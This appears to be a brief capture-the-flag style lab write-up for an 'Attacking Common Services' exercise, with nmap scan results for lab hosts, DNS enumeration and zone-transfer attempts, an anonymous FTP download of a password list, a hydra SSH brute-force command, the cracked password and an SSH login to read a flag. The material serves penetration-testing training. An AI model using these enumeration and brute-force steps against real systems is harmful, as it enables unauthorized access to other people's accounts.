Attacking Common Services - Medium
May 29, 2024
# Nmap 7.94 scan initiated Wed May 29 22:41:14 2024 as: nmap -sC -sV -oN nmap -vv 10.129.39.38
Nmap scan report for 10.129.39.38
Host is up, received conn-refused (0.65s latency).
Scanned at 2024-05-29 22:41:15 PST for 166s
Not shown: 995 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 71:08:b0:c4:f3:ca:97:57:64:97:70:f9:fe:c5:0c:7b (RSA)
| 256 45:c3:b5:14:63:99:3d:9e:b3:22:51:e5:97:76:e1:50 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGrNZZh3PTca9YkLp+xpAXtquE6wsTwEZmBtt6mism0idkizZWojfLqjeonge0ZYBEfXjTgMsfJ366hpWedHE8U=
| 256 2e:c2:41:66:46:ef:b6:81:95:d5:aa:35:23:94:55:38 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPlAiOeV++/9T5HzXC37wJRor3PaSuVOGLaNFz7pEl1/
53/tcp open domain syn-ack ISC BIND 9.16.1 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.16.1-Ubuntu
110/tcp open pop3 syn-ack Dovecot pop3d
| ssl-cert: Subject: commonName=ubuntu
| Subject Alternative Name: DNS:ubuntu
| Issuer: commonName=ubuntu
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-04-11T16:38:55
| Not valid after: 2032-04-08T16:38:55
| MD5: a03e:afe0:3b9e:242f:45ce:81ea:9205:485b
| SHA-1: f95b:c0ca:f558:d268:5442:7213:80b6:ec09:2df5:55c0
|_pop3-capabilities: RESP-CODES SASL(PLAIN) USER CAPA STLS TOP AUTH-RESP-CODE PIPELINING UIDL
|_ssl-date: TLS randomness does not represent time
995/tcp open ssl/pop3 syn-ack Dovecot pop3d
|_pop3-capabilities: SASL(PLAIN) UIDL RESP-CODES AUTH-RESP-CODE USER CAPA PIPELINING TOP
| ssl-cert: Subject: commonName=ubuntu
| Subject Alternative Name: DNS:ubuntu
| Issuer: commonName=ubuntu
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-04-11T16:38:55
| Not valid after: 2032-04-08T16:38:55
| MD5: a03e:afe0:3b9e:242f:45ce:81ea:9205:485b
| SHA-1: f95b:c0ca:f558:d268:5442:7213:80b6:ec09:2df5:55c0
|_ssl-date: TLS randomness does not represent time
2121/tcp open ftp syn-ack
| fingerprint-strings:
| GenericLines:
| 220 ProFTPD Server (InlaneFTP) [10.129.39.38]
| Invalid command: try being more creative
| Invalid command: try being more creative
| NULL:
|_ 220 ProFTPD Server (InlaneFTP) [10.129.39.38]
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed May 29 22:44:01 2024 -- 1 IP address (1 host up) scanned in 166.75 seconds
Starting Nmap 7.94 ( https://nmap.org ) at 2024-05-30 19:40 PST
Nmap scan report for 10.129.11.163
Host is up (0.29s latency).
PORT STATE SERVICE VERSION
30021/tcp open ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 ftp ftp 4096 Apr 18 2022 simon
| fingerprint-strings:
| GenericLines:
| 220 ProFTPD Server (Internal FTP) [10.129.11.163]
| Invalid command: try being more creative
|_ Invalid command: try being more creative
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
sudo vim /etc/hosts
cat /etc/hosts
./subbrute.py inlanefreight.htb -s ./names.txt -r ./resolvers-try.txt
dnsenum --dnsserver 10.129.39.38 --enum -p 0 -s 0 -o subdomains.txt -f /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt inlanefreight.htb
# I GOT NOTHING WHEN
dig axfr *.inlanefreight.htb @inlanefreight.htb
dig axfr *.inlanefreight.htb. @10.129.201.127
ANSWER HERE
ftp 10.129.11.163 30021
ls -la
cd simon
ls -la
get mynotes.txt
cat mynotes.txt
hydra -l simon -P mynotes.txt 10.129.11.163 ssh
login: simon password: 8Ns8j1b!23hs4921smHzwn
ssh simon@10.129.11.163
ls
cat flag.txt